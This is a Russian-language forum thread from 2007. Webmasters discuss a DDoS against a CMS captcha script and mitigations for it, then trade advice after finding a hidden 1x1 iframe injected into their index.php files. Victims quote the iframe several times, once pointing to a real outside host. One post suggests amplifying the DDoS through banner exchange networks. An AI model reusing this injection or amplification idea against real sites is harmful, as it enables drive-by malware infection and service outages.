Allseek 0 Опубликовано: 19 января 2007 Рассказать Опубликовано: 19 января 2007 1. версия 5.2....я думаю и в 5.3 тоже самое.. 2. Ддос идет на 1 файл (engine/modules/antibot.php?run=====*** вместо звездочек любая комбинация чисел...вводя вместо звездочек цифры разные на бум...будет выводится картинка защищающая от ботов при добавлении комментов или при регистрации нового пользователя) Так вот именно на этот файл и идет ддос...нехилый 3. Как с этим бороться можно? Я впринцепи отключил каптчу при регистрации новых юзеров...и файл сделал пустым....но ддос все равно идет хотя файл и пустой ) а до тех пора пока не просекли как ддос иде, сервер ели дышал..как файл чистым сделал полегче стало...ддос уже 4-ый день идет... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 19 января 2007 Рассказать Опубликовано: 19 января 2007 Allseek, При DDOS это не решение, завтра будет DDOS на index.php, вы что обнулите index.php. Нужно отслеживать IP с которых идет DDOS и блокировать подсети. Так тупой бот будет до бесконечности пытаться распознать картинку даже которой нет, если имеет доступ к серверу. Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 20 января 2007 Рассказать Опубликовано: 20 января 2007 на самом деле капча это серьезное уязвимое место для сайтов/движков, ибо при формировании капчи тратяться ресурсы (имхо порой больше чем на саму страницу). как вариант (видел на bigmir.net) у них были готорые заготовленные капчи (около 100k картинок, они папку не закрыли для просмотра =)), но это тоже не выход, ибо можно собрать себе такую коллекцию и написать "распознаватель" по хешу Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 20 января 2007 Рассказать Опубликовано: 20 января 2007 как вариант (видел на bigmir.net) у них были готорые заготовленные капчи (около 100k картинок, они папку не закрыли для просмотра =)), но это тоже не выход, ибо можно собрать себе такую коллекцию и написать "распознаватель" по хешу Я понимаю что для одного сайта это может быть решением, а для движка? код которого доступен это значит вообще полное отсутствие этой функции. Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 20 января 2007 Рассказать Опубликовано: 20 января 2007 дык я и не говорил что это необходимо делать... хотя, если сделать отдельный скрипт, который бы мог просто нагенерировать таких картинок по требованию пользователя столько сколько нужно, а потом прописать в базу... + можно было бы удалять и генерировать заного... например раз в месяц/два/полгода..... Цитата Ссылка на сообщение Поделиться на других сайтах
NetSpider 0 Опубликовано: 20 января 2007 Рассказать Опубликовано: 20 января 2007 2. Ддос идет на 1 файл (engine/modules/antibot.php?run=====*** вместо звездочек любая комбинация чисел...вводя вместо звездочек цифры разные на бум...будет выводится картинка защищающая от ботов при добавлении комментов или при регистрации нового пользователя) Так вот именно на этот файл и идет ддос...нехилый надо сделать, чтобы проверялся ИП и, если попытка зарегистрироваться/добавить комментарий раньше, чем через <заданное время> (например, 30 секунд), просто выводить сообщение, что комментарий можно добавить не ранее <заданного времени>. ЗЫ генерирование тысяч картинок - глупость редкая ИМХО. Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 20 января 2007 Рассказать Опубликовано: 20 января 2007 сразу видно, человек знаком с ддосом..... бугагаа Цитата Ссылка на сообщение Поделиться на других сайтах
mmaxim 0 Опубликовано: 12 февраля 2007 Рассказать Опубликовано: 12 февраля 2007 У мну именно так сервак и положили, после ребута движек выдал что он Not Installed Цитата Ссылка на сообщение Поделиться на других сайтах
kvasoff 0 Опубликовано: 23 февраля 2007 Рассказать Опубликовано: 23 февраля 2007 вот какая проблема: захожу на сайт - белый экран страница загружена. заменил index.php всё заработало и так повторялось уже три раза. ПОМОГИТЕ срочно в чём дело! меня хакнули? Цитата Ссылка на сообщение Поделиться на других сайтах
Stude_nt 0 Опубликовано: 23 февраля 2007 Рассказать Опубликовано: 23 февраля 2007 kvasoff, Преже чем заменять index.php надо скачать его!!! В последнее время ломают не сайты, а серваки и вставляют в индексы всех сайтов на нём, ифреймы (белый экран скорее всего из-за этого). Цитата Ссылка на сообщение Поделиться на других сайтах
kvasoff 0 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 kvasoff, Преже чем заменять index.php надо скачать его!!! В последнее время ломают не сайты, а серваки и вставляют в индексы всех сайтов на нём, ифреймы (белый экран скорее всего из-за этого). Да именно в этом дело в index.php было вставлен этот код <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php Как с этим бороться? хостеру написать? заранее спасибо за ответ.... Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 поверить на трои машину, сменить пароли на ftp, пнуть хостера Цитата Ссылка на сообщение Поделиться на других сайтах
medi 0 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 (изменено) <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php ОПА!! У меня такое уже два дня! Уязвимость двига? Изменено 25 февраля 2007 пользователем Scofild Цитата Ссылка на сообщение Поделиться на других сайтах
kvasoff 0 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 вот недавно опять Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 (изменено) уязвимость хостера, ктото рут поимел =) либо трои зы. от темы отвлеклись. Изменено 25 февраля 2007 пользователем xsash Цитата Ссылка на сообщение Поделиться на других сайтах
[sql] 0 Опубликовано: 25 февраля 2007 Рассказать Опубликовано: 25 февраля 2007 <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php А причём тут ддос? это для заражение вирусами делают либо для накрутки счетчиков. Да и Ддос это не уязвимость=) а масовая атака на какой либо сервер запросами, дабы не справился серв и лёг. Цитата Ссылка на сообщение Поделиться на других сайтах
Volfgang 4 Опубликовано: 2 марта 2007 Рассказать Опубликовано: 2 марта 2007 (изменено) <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php> Если у Вас это, значит Вас сильно поимели, 1 - Сменить пароль на фтп и отключить комп от инета, провести антивирусную проверку и проверку на SpyWare, вычистить все, сделать повторную проверку. (Сразу скажу NOD32 Вам не поможет, оптимален вариант Kaspersky+Outpost+SpyBot) 2 - Сменить пароли на все, ибо к Вам попал троян Snatch, по русски "Спи***ли" и все пароли от почты, асек, фтп и т д доступны владельцам сервака с которого троян идет. 3 - Хостера пинать нет смысла, вирус попал к Вам через дырку в IE, он обходит антивирусы и фаерволы эмулируя себя под компонент винды. Выход? Использовать Opera. P/S сам был жертвой, а недавно ко мне постучали в ICQ добрые люди, сказав что они взломали сервак данного вируса и нашли все мои логи, логи скинули и обещали удалить, но посоветовали поменять пароли на все. Собственно я и сам догадался, что стоит это сделать, ибо в логах что мне дали были мои пароли на ВСЕ. Вопросы? Изменено 2 марта 2007 пользователем Volfgang Цитата Ссылка на сообщение Поделиться на других сайтах
Legonavt 0 Опубликовано: 3 марта 2007 Рассказать Опубликовано: 3 марта 2007 А вы поменьше ставьте nulled версии! Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 3 марта 2007 Рассказать Опубликовано: 3 марта 2007 а от этого не зависит ничего, все зависит от компетентности хостера и конечного пользователя. закройте тему, уже давно ушли от темы ддоса =\ а жаль Цитата Ссылка на сообщение Поделиться на других сайтах
Гость fatalenergy Опубликовано: 4 марта 2007 Рассказать Опубликовано: 4 марта 2007 По поводу каптча, думаю нагрузка при поиске будет куда больше, но интересно, что будет если ссылку на engine/modules/antibot.php разместить в крупной баннерообменной сети? Цитата Ссылка на сообщение Поделиться на других сайтах
andalit 0 Опубликовано: 29 марта 2007 Рассказать Опубликовано: 29 марта 2007 1) можно сделать время (через которое можно повторно скачивать картинку) 2)Можно заменить стат адрес на хеш (который генерируется по нику регистрируемого, или по времени, или ешё както) 3)можно сделать проверку с какой страницы заходит юзер и качает эту картинку. Цитата Ссылка на сообщение Поделиться на других сайтах
gu4ioil 0 Опубликовано: 24 апреля 2007 Рассказать Опубликовано: 24 апреля 2007 (изменено) По поводу каптча, думаю нагрузка при поиске будет куда больше, но интересно, что будет если ссылку на engine/modules/antibot.php разместить в крупной баннерообменной сети? Ты прав. Сервак может слечь, если будет одновременно открыто порядко 50 таких страниц http://ddos-hack.narod.ru/ruszona.html Поэтому я бы тоже позаботился о том, что бы ограничить доступ к этому файлу из вне - это ведь непроблемно, ограничивается в файле конфигурации сервера .htaccess Изменено 24 апреля 2007 пользователем Гучи_Ойл Цитата Ссылка на сообщение Поделиться на других сайтах
nukex 0 Опубликовано: 4 мая 2007 Рассказать Опубликовано: 4 мая 2007 (изменено) <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php Это у тебя вирус. Проверь в папке windows файл csrss.exe, такой же файл лежит в system32 - его не нужно удалять. Изменено 4 мая 2007 пользователем nukex Цитата Ссылка на сообщение Поделиться на других сайтах
USN-Team 0 Опубликовано: 24 мая 2007 Рассказать Опубликовано: 24 мая 2007 <?php <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://------------/xc/"></iframe><!-- ~ --><?php> Если у Вас это, значит Вас сильно поимели, 1 - Сменить пароль на фтп и отключить комп от инета, провести антивирусную проверку и проверку на SpyWare, вычистить все, сделать повторную проверку. (Сразу скажу NOD32 Вам не поможет, оптимален вариант Kaspersky+Outpost+SpyBot) 2 - Сменить пароли на все, ибо к Вам попал троян Snatch, по русски "Спи***ли" и все пароли от почты, асек, фтп и т д доступны владельцам сервака с которого троян идет. 3 - Хостера пинать нет смысла, вирус попал к Вам через дырку в IE, он обходит антивирусы и фаерволы эмулируя себя под компонент винды. Выход? Использовать Opera. P/S сам был жертвой, а недавно ко мне постучали в ICQ добрые люди, сказав что они взломали сервак данного вируса и нашли все мои логи, логи скинули и обещали удалить, но посоветовали поменять пароли на все. Собственно я и сам догадался, что стоит это сделать, ибо в логах что мне дали были мои пароли на ВСЕ. Вопросы? Очень интересная вещь он может дать о себе знать одним способом просто в IE или в Mozille в низу будет странный пиксель мне чувак в асю стучался буквально час назад с такой проблемой нашел сам вирус в чистом виде называется audiv8index если найдете ифрайм <iframe src="http://www.consult-finance.com/temp/index.html" width=1 height=1></iframe> с ссылкой на этот сайт то выдергиваем кабель и удалаем все нахрен к чертям Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.